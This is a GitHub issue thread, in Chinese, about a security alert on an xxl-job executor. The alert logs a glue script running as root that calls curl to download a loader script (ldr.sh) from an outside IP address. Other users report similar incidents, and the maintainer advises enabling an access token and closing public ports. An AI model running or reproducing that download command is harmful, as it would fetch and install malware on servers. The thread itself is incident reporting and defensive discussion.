### ISSUE TITLE
官方镜像安装后发现异常访问下载木马程序 ？？？？？？

### ISSUE THREAD

**Issue by coolabingge** [xuxueli/xxl-job#2312]
备注处理
该告警由如下引擎检测发现：
父进程路径: /bin/bash
父进程命令行: bash /data/joblog/handler/gluesource/1_1586699003758.sh demoJobHandler 0 0
父进程id: 15323
进程ID: 15325
用户名: root
URL链接: http://194.40.243.98/ldr.sh
进程路径: /usr/bin/curl
命令行参数: curl --user-agent curl_xxljobUnauth http://194.40.243.98/ldr.sh
事件说明: 检测模型发现您的服务器正在尝试访问一个可疑的恶意下载源，可能是黑客通过弱口令或命令执行漏洞，从远程服务器下载恶意文件，危害服务器安全。
解决方案: 请及时排查告警中提示的恶意URL，以及所下载的目录下的恶意文件，并及时清理已运行的恶意进程。如果该指令是您自己主动执行的，您可以在控制台点击标记为误报。

这是阿里云爆出来的，大侠看看呀，还好开发环境发现

**Comment by lwsbox** [comment]
https://www.gdcert.com.cn/KeyIntelligence/detail/Vl5DWA   和这个有关系吗

**Comment by wzshuang** [comment]
-[23012]  bash /data/applogs/xxl-job/jobhandler/gluesource/6_1649620476000.sh a 0 1

我今天也遇到了，要怎么修复

**Comment by xuxueli** [comment]
1、生产环境建议启用通讯 accessToken提升安全性。
2、请勿将不必要的端口开放到公网, 不限于 xxl-job。
